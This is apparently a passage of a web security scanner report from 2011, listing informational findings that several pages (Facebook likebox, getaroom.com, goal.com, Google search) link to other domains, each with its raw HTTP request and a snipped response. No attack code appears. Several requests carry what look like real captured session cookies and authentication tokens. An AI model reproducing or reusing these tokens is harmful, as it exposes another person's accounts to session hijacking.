<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/CqGiwf44cv7.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/i6dwhw2w3_E.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/2a5cp8CEPck.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/nikefootball" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276804_51212153078_1087383549_q.jpg" alt="Nike Football" /></a>
...[SNIP]...
19.190. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fmanchesterunited&width=303&colorscheme=dark&connections=0&stream=no&header=no&height=60 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.110.60
X-Cnection: close
Date: Mon, 03 Oct 2011 01:56:33 GMT
Content-Length: 8605

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/xfwWw0TCQIH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/p1kOEng59HG.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/3KQwHYVeQS2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/manchesterunited" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276862_7724542745_270400417_q.jpg" alt="Manchester United" /></a>
...[SNIP]...
19.191. http://www.getaroom.com/washington-dc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /washington-dc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /washington-dc?amenities%5B%5D=&check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&commit=Go&lucky=true&page=1&property_name=&rinfo=%5B%5B18%5D%5D&search%5Bdestination%5D=m10&sort_order=position HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.3.8.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html; show_pu=pageview=1&allowed=true&shown=false; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "d2a96c7313287816400edfcdf271bec7"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 1110
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CjoLc2VhcmNoaQPmLuY6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNzQ2ZWU2NzIwNWNhYjFlZjA2OTIzYWNlNWE2NGUxMTQ6EF9jc3JmX3Rva2VuIjFIc3ZVTXFGbm9OeXdJNndseElkTFBVeGNBUVRPb2NIaTlJZERGd1ZxVkhjPToTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--5dfe791c81b6c944bb35ded07f19836e6a759bfc; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 170579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...
<link href="/apple-touch-icon.png?1303990536" type="image/png" rel="apple-touch-icon" />


<link rel="dns-prefetch" href="http://s3.amazonaws.com/" />

<meta name="y_key" content="06334f987d25f373" />
...[SNIP]...
<li class="deals"><a href="http://www.getaroomgetaways.com/hotel-deals/deals.html"><span class="mid">
...[SNIP]...
<li><a href="http://getaroom.hotelplanner.com/"><span class="mid">
...[SNIP]...
<li class="last-child"><a href="http://getaroom.neatgroup.com/getaroom/CPSearch?DD=GETAROOM"><span class="right-end-mid">
...[SNIP]...
<a href="/hotels/washington-court-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/7a9efb8e-f749-4171-88d1-a1a04b9b04a1/was-wcou_main_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/days-inn-connecticut-avenue" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/96af526b-0e8d-48f1-8191-024a87908fea/ext_night_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/lenfant-plaza-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/587ec07c-ca1d-4340-a73e-0c960618b336/images_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/capitol-skyline-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/3ad56081-8034-4604-8f05-62c26bb23b9c/was-capbldg_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-pentagon-reagan-airport" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/d0c3d9d9-85bb-43bc-b97a-316833519817/bw_ext_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-sheraton-national" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/6fba198b-88ad-4f3a-8867-9d50eea4869d/she829ex_34691_md_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/comfort-inn-suites-near-union-station-2" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/7ae77e1f-3460-4422-8ea8-2ff873bd6372/dc012a1_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/capitol-hill-suites" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/e9c0ef90-47c1-406b-9ea6-48cb55ff5f60/outside_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-churchill-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/6ddf5f2e-aaf3-4c13-aa41-c5027ae89ed3/churchill_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-hotel-at-arundel-preserve" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/643fc96f-fa6d-43cf-b999-9f4ba939384e/placetostay_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-mount-vernon" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/509b35b1-542d-4082-a9a9-d4f0c790f274/24271_23_b_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-normandy-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/dfe45354-d64d-4591-a935-355333db6417/normandy_exterior_gallery_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/comfort-inn-arlington-at-ballston" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/b581e0d4-8b73-4ea0-a76e-701a2ff5d500/was-ball_bldg_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-virginian-suites" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/0d02fbe5-e403-48a7-9987-4398e1dab25b/was-vasuit_main_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-manassas" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/c1bf0b64-07b0-4cd6-aac9-28a79323d4b8/was-bwma_bldg_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/gaylord-national" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/841b0f75-2133-463e-a1e0-0fa8b7b95ce5/exterior_f_2_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-quincy-suites" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/94470159-bd8b-40a4-85d9-d5dfe83c22b4/was-quin_main_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/the-madison" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/7dddc1e4-b172-482f-8401-5f89cf3c2daf/was-madi_bldg_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/hawthorn-suites-alexandria" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/90a59fa0-479e-4208-934b-13cc571ecab6/hawthorn_exterior_3_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/savoy-suites-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/7dc23653-794a-462f-b4c9-808d08497fc6/savoysuitesexterior1_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-capital-beltway-hotel" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/5fe183b4-5e23-4755-96fb-4b59dc987ee5/p_0001_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/westin-washington-dulles-airport" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/09176515-4f1b-4178-8a92-e2cd4b45f21a/wes3103cl.87291_md_grid_1.jpg" width="60" /></a>
...[SNIP]...
<a href="/hotels/best-western-rosslyniwo-jima" class="thumbnail"><img alt="" class="property-image" height="60" src="http://s3.amazonaws.com/s3aws.getaroom.com/property_images/373a76ff-1bf5-4b21-8534-e937c79d718f/was-bwri_bldg2_grid_1.jpg" width="60" /></a>
...[SNIP]...
<br/>
<a href="http://www.google.com/support/bin/answer.py?answer=23852">How to enable JavaScript in your browser</a>
...[SNIP]...
</div>

<img src="http://ad.adtegrity.net/pixel?id=905511&amp;t=2" class="pixel" width="1" height="1" alt="" />
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1039030038/?label=O3AsCL6F6wEQlq657wM&amp;guid=ON&amp;script=0"/><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032687336/?label=OlSFCLCK4AEQ6J227AM&amp;guid=ON&amp;script=0"/>


<!-- WAI-ARIA landmark roles: http://www.paciellogroup.com/blog/?p=106 -->
...[SNIP]...
<li><a class="badge badge-twitter" href="http://twitter.com/getaroomcom"><span>
...[SNIP]...
<li><a class="badge badge-facebook" href="http://www.facebook.com/pages/GetARoomcom/90405626754"><span>
...[SNIP]...
<li><a class="badge badge-youtube" href="http://www.youtube.com/user/getaroomcom"><span>
...[SNIP]...
<li><a href="http://www.getaroomgetaways.com/hotel-deals/deals.html">Hotel Deals</a>
...[SNIP]...
<p class="tripadvisor"><img src="http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif" width="207" height="51" alt="TripAdvisor" /></p>
...[SNIP]...
19.192. http://www.goal.com/en/comment/comments-box  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/comment/comments-box

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en/comment/comments-box?allCommentsUrl=%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run%2Fcomments&entityId=13994828 HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5; l=en

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:56 GMT
Expires: Sat, 01 Oct 2011 23:58:55 +0000
Last-Modified: Sun, 02 Oct 2011 23:58:55 GMT
Server: ECS (sjo/5225)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar
Content-Length: 7224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">

...[SNIP]...
<meta name="layout" content="include"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
19.193. http://www.google.com/cse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /cse

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 00:58:36 GMT
Expires: -1
Cache-Control: private, max-age=0
X-Frame-Options: ALLOWALL
X-Content-Type-Options: nosniff
Server: qfe
Content-Length: 22066
X-XSS-Protection: 1; mode=block

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>travel booking hotel - Google Search</title><style>html{overflow-y:scroll} div,td,.n a,.n a:visited{ color:#333 }
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services')" target="_top">Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/images/uploads/releases/GT_Hotel_Mobile_Rls_FINAL.pdf" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/images/uploads/releases/GT_Hotel_Mobile_Rls_FINAL.pdf')" target="_top">GetThere Introduces Mobile <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_res" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/sabre_res')" target="_top">Sabre .Res - Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/government/" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/government/')" target="_top">Government <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/travel_supplier/hotel/" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/travel_supplier/hotel/')" target="_top"><b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/world_choice_travel" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/world_choice_travel')" target="_top">World Choice <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_hotel_vision" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/sabre_hotel_vision')" target="_top">Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/getthere_directgovernment/" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/getthere_directgovernment/')" target="_top">GetThere DirectGovernment | Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_red_workspace" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/sabre_red_workspace')" target="_top">Sabre Red Workspace - Sabre <b>
...[SNIP]...
<h2 class="r"><a class="l" href="http://www.sabretravelnetwork.com/home/products_services/products/sabre_vacations" onmousedown="return curwt(this, 'http://www.sabretravelnetwork.com/home/products_services/products/sabre_vacations')" target="_top">Sabre Vacations - Sabre <b>
...[SNIP]...
19.194. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?gcx=c&sourceid=chrome&ie=UTF-8&q=.hotelplanner.com HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:40:58 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 134623

<!doctype html> <head> <title>.hotelplanner.com - Google Search</title> <script>window.google={kEI:"qhKJTpngEebZiALY7bDXDA",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute(
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?gcx=c&q=.hotelplanner.com&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hotelplanner.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CEEQFjAA')">Group Travel - Group Hotel Rates &amp; Event Planner Discounts <b>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:W1JpwSHCGSMJ:www.hotelplanner.com/+.hotelplanner.com&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CEMQIDAA')">Cached</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/search/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CEgQjBAwAQ')">Search For Hotel <b>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/ContactUs.cfm" class=l onmousedown="return clk(this,this.href,'','','','3','','0CE0QjBAwAg')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/Hotels/2175-in-Las-Vegas-NV.html" class=l onmousedown="return clk(this,this.href,'','','','4','','0CFIQjBAwAw')">Hotels in Las Vegas NV</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/HotelForm.cfm" class=l onmousedown="return clk(this,this.href,'','','','5','','0CFcQjBAwBA')">Hotel Signup</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://findgroupdeals.hotelplanner.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CFwQjBAwBQ')">FindGroupDeals.com</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hotelplanner.com/GroupForm.cfm" class=l onmousedown="return clk(this,this.href,'','','','7','','0CGEQjBAwBg')">Group Hotel Reservation <b>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/hotelplanner" class=l onmousedown="return clk(this,this.href,'','','','8','','0CGkQFjAH')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:YifskaDOUAQJ:www.facebook.com/hotelplanner+.hotelplanner.com&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CGsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://itunes.apple.com/us/app/hotelplanner.com-hotel-reservations/id420759661?mt=8" class=l onmousedown="return clk(this,this.href,'','','','9','','0CHAQFjAI')">App Store - <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:5I53_q5_HLQJ:itunes.apple.com/us/app/hotelplanner.com-hotel-reservations/id420759661%3Fmt%3D8+.hotelplanner.com&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:5I53_q5_HLQJ:itunes.apple.com/us/app/hotelplanner.com-hotel-reservations/id420759661%3Fmt%3D8+.hotelplanner.com&cd=9&hl=en&ct=clnk&gl=us','','','','9','','0CHUQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.gadling.com/2011/01/11/free-hotel-rooms-nfl-playoffs/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CHkQFjAJ')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:4jspZpZhRBoJ:www.gadling.com/2011/01/11/free-hotel-rooms-nfl-playoffs/+.hotelplanner.com&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CHsQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://groups.airporthotelguide.com/GroupForm.cfm" class=l onmousedown="return clk(this,this.href,'','','','11','','0CH8QFjAK')">Group Hotel Reservation Request</a>
...[SNIP]...
